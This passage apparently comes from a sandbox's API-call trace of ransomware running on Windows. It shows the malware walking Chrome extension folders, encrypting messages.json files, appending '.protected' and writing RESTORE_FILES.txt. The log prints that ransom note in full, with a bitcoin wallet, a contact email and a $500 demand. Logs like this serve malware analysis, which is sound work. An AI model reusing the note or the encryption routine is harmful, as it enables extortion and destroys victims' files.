(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.668] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.668] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.668] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.668] CloseHandle (hObject=0x164) returned 1 [0080.668] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Windows") returned -1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Program Files") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="Program Files (x86)") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="$Recycle.bin") returned 1 [0080.668] lstrcmpiW (lpString1="si", lpString2="System Volume Information") returned -1 [0080.668] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si") returned 141 [0080.668] lstrcmpW (lpString1="si", lpString2=".") returned 1 [0080.668] lstrcmpW (lpString1="si", lpString2="..") returned 1 [0080.668] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*") returned 143 [0080.668] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.668] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.668] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.668] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\.") returned 143 [0080.669] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.669] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.669] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.669] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\..") returned 144 [0080.669] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.669] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.669] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.669] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.669] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.669] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.669] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.669] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.669] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.670] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json") returned 155 [0080.670] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.670] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14e, lpOverlapped=0x0) returned 1 [0080.671] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14e, lpOverlapped=0x0) returned 1 [0080.671] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.671] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.671] CloseHandle (hObject=0x168) returned 1 [0080.671] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected") returned 165 [0080.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.protected")) returned 1 [0080.672] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.672] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.672] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\RESTORE_FILES.txt") returned 159 [0080.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.673] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.673] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.673] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.673] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.674] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.674] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.674] CloseHandle (hObject=0x164) returned 1 [0080.674] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0080.674] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0080.674] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk") returned 141 [0080.674] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0080.674] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0080.674] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*") returned 143 [0080.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.675] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.675] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.675] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.675] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\.") returned 143 [0080.675] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.675] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.675] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.675] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.675] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.675] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\..") returned 144 [0080.675] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.675] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.676] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.676] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.676] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.676] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.676] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.676] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.676] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.676] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.676] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.677] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.677] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json") returned 155 [0080.677] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.677] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc5, lpOverlapped=0x0) returned 1 [0080.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc5, lpOverlapped=0x0) returned 1 [0080.678] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.678] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.678] CloseHandle (hObject=0x168) returned 1 [0080.678] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected") returned 165 [0080.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.protected")) returned 1 [0080.679] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.679] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.679] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0080.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.679] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.679] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.680] lstrlenA 